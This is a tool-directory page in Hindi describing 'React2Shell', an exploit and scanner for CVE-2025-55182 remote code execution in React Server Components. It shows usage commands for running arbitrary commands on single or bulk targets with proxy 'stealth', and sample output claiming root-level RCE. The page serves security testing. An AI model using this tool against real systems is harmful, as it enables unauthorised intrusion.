Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/ankitspandey07/react2shell
भेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूल
GitHubankitspandey07/react2shell

React2Shell

CVE-2025-55182-advanced-scanner

रिपॉजिटरी देखें
9 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

@#React2Hell — CVE-2025-55182 शोषण

🔥 Next.js / React सर्वर रिमोट कोड निष्पादन (RCE) शोषण

root@kitploit:~
█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                
{MAGENTA} Next.js/React सर्वर RCE शोषण — CVE-2025-55182
 लेखक: Ankit Pandey GitHub: https://github.com/ankitspandey07
    🚀  React2Shell — सुरक्षा परीक्षण उपयोगिता  🚀

════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]

🚀 अवलोकन

React2Hell एक शक्तिशाली शोषण उपकरण है जो CVE-2025-55182 का परीक्षण और शोषण करने के लिए डिज़ाइन किया गया है, जो Next.js और React सर्वर एक्शन को प्रभावित करने वाली एक गंभीर रिमोट कोड निष्पादन भेद्यता है।

React सर्वर घटकों के संस्करण 19.0.0, 19.1.0, 19.1.1, और 19.2.0 में एक प्री-ऑथेंटिकेशन रिमोट कोड निष्पादन भेद्यता मौजूद है, जिसमें निम्नलिखित पैकेज शामिल हैं: react-server-dom-parcel, react-server-dom-turbopack, और react-server-dom-webpack। कमजोर कोड HTTP अनुरोधों से सर्वर फ़ंक्शन एंडपॉइंट पर पेलोड को असुरक्षित रूप से डिसिरियलाइज़ करता है।


✨ विशेषताएँ

  • 🧨 रिमोट कोड निष्पादन (RCE)
  • 🌐 एकल URL / बल्क URL स्कैनिंग
  • 🧩 कस्टम कमांड निष्पादन
  • 🕵️‍♂️ प्रॉक्सी समर्थन के साथ स्टील्थ मोड
टूल डाउनलोड करें
  • ⚡ तेज़, विश्वसनीय और उपयोग में आसान

  • 📌 उपयोग

    एकल लक्ष्य मोड

    root@kitploit:~
    python Scanner.py -u https://target.com -c "whoami"
    

    एकाधिक लक्ष्य (फ़ाइल से)

    root@kitploit:~
    python Scanner.py -l urls.txt -c "whoami"
    

    HTTP प्रॉक्सी के साथ (Burp Suite)

    root@kitploit:~
    python Scanner.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080
    

    HTTPS प्रॉक्सी के साथ

    root@kitploit:~
    python Scanner.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080
    

    📁 urls.txt उदाहरण

    root@kitploit:~
    http://site1.com
    https://site2.com
    http://192.168.1.10:3000
    

    🖥️ नमूना आउटपुट

    root@kitploit:~
    PS D:\Ankitspandey07\React2Hell> python.exe .\Scanner.py -l .\list.txt -c whoami
    
    
    █████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
    ██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
    ██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                    
    {MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
     Author: Ankit Pandey GitHub: https://github.com/ankitspandey07
        🚀  React2Shell — Security Testing Utility  🚀
    
    ════════════════════════════════════════════════════════════════════════
    [+] Loaded 3 targets
    ════════════════════════════════════════════════════════════════════════
    
    [→] Target: http://evil.com:3113/
    [→] Exec:   whoami
    [✓] VULNERABLE — RCE Successful!
    ------------------------------------------------------------
    root
    ------------------------------------------------------------
    ────────────────────────────────────────────────────────────────────────
    
    [→] Target: http://example.lab:2000/
    [→] Exec:   whoami
    [✗] Not vulnerable — Status: 200
    ────────────────────────────────────────────────────────────────────────
    
    [→] Target: https://tale.lab:3000/
    [→] Exec:   whoami
    [✓] VULNERABLE — RCE Successful!
    ------------------------------------------------------------
    win-1fl835ovldc\\administrator
    ------------------------------------------------------------
    ────────────────────────────────────────────────────────────────────────
    [✓] Scan complete — Vulnerable: 2
    PS D:\Ankitspandey07\React2Hell>
    

    ⚠️ अस्वीकरण

    यह उपकरण विशेष रूप से शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए बनाया गया है। स्पष्ट प्राधिकरण के बिना इसका उपयोग सिस्टम पर न करें। आप अपने कार्यों के लिए स्वयं जिम्मेदार हैं।


    ⭐ परियोजना का समर्थन करें

    यदि इस शोषण ने आपकी मदद की, तो GitHub पर ⭐ छोड़ने पर विचार करें ❤️


    👤 लेखक

    Ankit Pandey; GitHub: https://github.com/Ankitspandey07

    गर्व और जुनूनी पेंटेस्टर द्वारा 🔥 के साथ बनाया गया, जो हर कदम पर सीखने में सफल होता है।